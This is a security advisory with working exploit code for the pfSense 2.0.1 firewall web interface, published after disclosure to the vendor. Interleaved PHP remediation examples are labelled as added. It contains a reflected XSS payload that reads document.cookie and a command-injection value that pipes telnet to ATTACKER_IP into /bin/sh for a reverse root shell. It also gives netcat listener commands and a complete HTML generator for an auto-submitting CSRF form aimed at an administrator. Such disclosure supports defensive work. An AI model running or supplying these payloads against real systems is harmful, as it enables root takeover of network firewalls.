"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution"

Author: Yann CAM
Platform: php
Release date: 2013-01-05

######################################################################
# Exploit Title: pfSense 2.0.1 XSS & CSRF Remote root Access
# Date: 04/01/2013
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.0.1
# Category: XSS & CSRF Remote root Access
# Google dork:
# Tested on: FreeBSD
######################################################################



pfSense firewall/router distribution description :
======================================================================

pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. 

This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus.

Version 2.0.1 of the distribution contains several vulnerabilities: XSS, and a CSRF that leads to remote command execution with a reverse root shell. It is strongly advised to update to version 2.0.2, available now.



Proof of Concept 1 :
======================================================================

Potential XSS (mitigated by CSRFMagic) with information disclosure :

File /usr/local/www/progress.php lines 21-30 :
  $X = upload_progress_meter_get_info( $_GET["UPLOAD_IDENTIFIER"] );
  if (!$X) {
    if ( array_key_exists( "e", $_GET ) ) {
      echo "<HTML><BODY onLoad='window.close();'>" . gettext("Invalid Meter ID") . "! {$_GET["UPLOAD_IDENTIFIER"]}";
      echo ('</BODY></HTML>');
    } else {
      echo ('<HTML><meta HTTP-EQUIV="Refresh" CONTENT="1; url='. $url .'"><BODY></BODY></HTML>');
    }
    exit;

Result with a direct call to this page :

Fatal error: Call to undefined function upload_progress_meter_get_info() in /usr/local/www/progress.php on line 21



Proof of Concept 2 :
======================================================================

Non-persistent (reflected) XSS :

File /usr/local/www/pkg_mgr_install.php line 166 :
      update_output_window(sprintf(gettext("Could not find %s."), $_GET['pkg']));

PoC :
  http://pfsense_url/pkg_mgr_install.php?mode=installedinfo&pkg=x%22;alert(document.cookie);this.document.forms[0].output.value+=%22
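The root cause of PoC 2 is that the package name is spliced into a JavaScript string literal, so the right fix is encoding for that context. The following is an added example, not pfSense's own code; it assumes update_output_window() emits a statement of the form `this.document.forms[0].output.value += "...";`, which is what the PoC payload closes and reopens.

```php
<?php
// Added example, not pfSense's own code: the reflected XSS of PoC 2 comes from
// dropping $_GET['pkg'] into a JavaScript string literal. Assumption: the
// update_output_window() helper emits
//   this.document.forms[0].output.value += "...";
// which is the statement the PoC payload closes and reopens.

// Mirrors the vulnerable pattern: untrusted text spliced into a JS string.
function output_window_js_vulnerable(string $text): string
{
    return '<script>this.document.forms[0].output.value += "' . $text . '";</script>';
}

// Hardened: json_encode() yields a valid JS string literal for any input, and
// the HEX flags encode < > & ' " as \uXXXX so the literal can neither close
// the surrounding <script> element nor escape an attribute if reused in HTML.
// JSON_INVALID_UTF8_SUBSTITUTE (PHP 7.2+) keeps it from returning false on
// malformed input, which would otherwise silently emit an empty literal.
function output_window_js(string $text): string
{
    $literal = json_encode(
        $text,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE
    );
    return '<script>this.document.forms[0].output.value += ' . $literal . ';</script>';
}

// Constructed input: the advisory's PoC payload, URL-decoded, as a plain string.
$pkg = 'x";alert(document.cookie);this.document.forms[0].output.value+="';
$message = sprintf("Could not find %s.", $pkg);

echo "Vulnerable:\n", output_window_js_vulnerable($message), "\n\n";
echo "Hardened:\n", output_window_js($message), "\n";
```

In the vulnerable output the payload becomes executable script; in the hardened output the whole message, quotes and parentheses included, remains one inert string assigned to the textarea.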



Proof of Concept 3 :
======================================================================

CSRF exploit to Remote Command Execution in root context :

File /usr/local/www/system_firmware.php line 118 (this script isn't protected with CSRFMagic) :
  if($_POST['kerneltype']) {
     if($_POST['kerneltype'] == "single")
       system("touch /boot/kernel/pfsense_kernel.txt");
     else
       system("echo {$_POST['kerneltype']} > /boot/kernel/pfsense_kernel.txt"); // vulnerability here
  }

This is the most dangerous vulnerability: through a CSRF attack, an attacker can obtain a full interactive reverse shell running as root.

Command normally executed :
  echo SMP > /boot/kernel/pfsense_kernel.txt

Forged $_POST['kerneltype'] value that turns the command into an RCE :
  SMP > /boot/kernel/pfsense_kernel.txt;telnet ATTACKER_IP 1337 | /bin/sh | telnet ATTACKER_IP 1338

The attacker needs two netcat listeners on their machine :
  nc -l -vv -p 1337 # to send command
  nc -l -vv -p 1338 # to read results
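The two defects behind PoC 3 are a missing CSRF check and a POST value interpolated into a shell command. A hardened form of that handler, as an added example that is neither pfSense's own code nor its 2.0.2 patch: it assumes csrf-magic is included on the page and exposes csrf_check(), and it limits the kernel types to the two values the advisory itself shows ("single" and "SMP").

```php
<?php
// Added example, not pfSense's own code or its 2.0.2 fix: the PoC 3 handler
// rewritten so that a forged POST can neither bypass CSRF protection nor
// reach a shell. Assumption: csrf-magic is included and exposes csrf_check().

// Assumption: only the kernel types named in the advisory are accepted.
const ALLOWED_KERNEL_TYPES = ['single', 'SMP'];
const KERNEL_MARKER = '/boot/kernel/pfsense_kernel.txt';

// Returns the value only when it is exactly one of the known types;
// strict comparison, so no type juggling and no partial matches.
function validate_kernel_type(?string $kerneltype): ?string
{
    if ($kerneltype === null) {
        return null;
    }
    return in_array($kerneltype, ALLOWED_KERNEL_TYPES, true) ? $kerneltype : null;
}

// Writes the marker file without a shell: touch() and file_put_contents()
// replace system("touch ...") and system("echo ... > ..."), so ';' and '|'
// in the input are never interpreted, and the whitelist rejects them anyway.
function write_kernel_type(?string $kerneltype): bool
{
    $kerneltype = validate_kernel_type($kerneltype);
    if ($kerneltype === null) {
        return false;
    }
    if ($kerneltype === 'single') {
        return touch(KERNEL_MARKER);
    }
    // Same file content as the original "echo SMP > file": value plus newline.
    return file_put_contents(KERNEL_MARKER, $kerneltype . "\n") !== false;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // csrf-magic aborts the request when the token is missing or wrong, which
    // is what stops the auto-submitting form from the advisory's generator.
    csrf_check();
    if (isset($_POST['kerneltype']) && !write_kernel_type($_POST['kerneltype'])) {
        http_response_code(400);
        echo 'Invalid kernel type';
    }
}
```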

A demonstration video of this exploitation, made as a proof of concept, is available here:
  http://www.youtube.com/watch?feature=player_embedded&v=qnmalMrrUF4

CSRF generator for the reverse root shell :

<html>
  <head>
    <script>
function trim(s){
  return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}
 
function generateCSRF(){
  var target = trim(document.getElementById("target").value);
  var attacker = trim(document.getElementById("attacker").value);
  var sendport = trim(document.getElementById("sendport").value);
  var readport = trim(document.getElementById("readport").value);
  var resultjs = "";
  resultjs += "<html><body><form name='x' action='" + target + "system_firmware.php' method='post'>";
  resultjs += "<input type='hidden' name='kerneltype' value='SMP > /boot/kernel/pfsense_kernel.txt;telnet " + attacker + " " + sendport + " | /bin/sh | telnet " + attacker + " " + readport + "' />";
  resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
  document.getElementById("resultjs").value = resultjs;
}
 
    </script>
  </head>
   <body onload="generateCSRF();">
     <h2>CSRF pfSense 2.0.1 to root RCE (reverse shell)</h2>
     <p>pfSense 2.0.1, the latest firewall/router distribution based on FreeBSD is vulnerable to a CSRF attack that allows gaining root access through a reverse shell.<br />
 The attacker must know the URL address of pfsense WebGui.<br />
 To obtain the reverseshell, attacker must place two netcat in listening mode on two different ports. One will be used to send commands and the other for receiving results.<br />
 On attacker machine :
       <pre>nc -l -vv -p 1337 # First netcat listener, to enter shell command.</pre>
       <pre>nc -l -vv -p 1338 # Second netcat listener, to receive commands results.</pre>
 (admin hash is in the /config/config.xml file on pfSense)
     </p>
 <form action="" onsubmit="generateCSRF();return false;">
   <table>
     <tr><td>URL's pfSense 2.0.1 Targeted :</td> <td>
       <input id="target" type="text" value="http://192.168.0.254:80/" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
     <tr><td>Attacker IP (reverse shell) :</td> <td>
       <input id="attacker" type="text" value="192.168.0.141" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
     <tr><td>Attacker binded port to send commands :</td> <td>
       <input id="sendport" type="text" value="1337" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
     <tr><td>Attacker binded port to read results :</td> <td>
       <input id="readport" type="text" value="1338" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
 
    <tr> <td>CSRF exploit to send to an admin : </td> <td>
      <textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea> </td>
     </tr>
   </table>
 </form>
 </body>
</html>


Solution:
======================================================================
2012-12-21:  Release 2.0.2




Additional resources :
======================================================================

- www.pfsense.org
- www.synetis.com
- www.synetis.com/2012/11/12/contribution-au-pare-feu-routeur-pfsense
- www.asafety.fr/vuln-exploit-poc/xss-csrf-rce-pfsense-2-0-1-remote-root-access
- www.youtube.com/watch?feature=player_embedded&v=qnmalMrrUF4
- github.com/bsdperimeter/pfsense/commit/73b9d3c60a337ab0fe979958990a717288844ddd
- github.com/bsdperimeter/pfsense/commit/33ba41314b5e78c16562365826aef9118f370e46



Report timeline :
======================================================================

2012-10-02 : Team alerted with many details, PoC, video and potential solution
2012-10-04 : Team response with correction links into git repository
2012-10-05 : Our feedback concerning their corrections
2012-12-10 : Request for the 2.0.2 release date (no response)
2012-12-21 : Release 2.0.2
2013-01-04 : Public advisory



Credits :
======================================================================

    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security

Yann CAM - Security Consultant @ synetis



Last word :
======================================================================

Thanks to the whole pfSense team for their professionalism and quality solution, despite these few minor weaknesses.

-- 
SYNETIS
CONTACT: www.synetis.com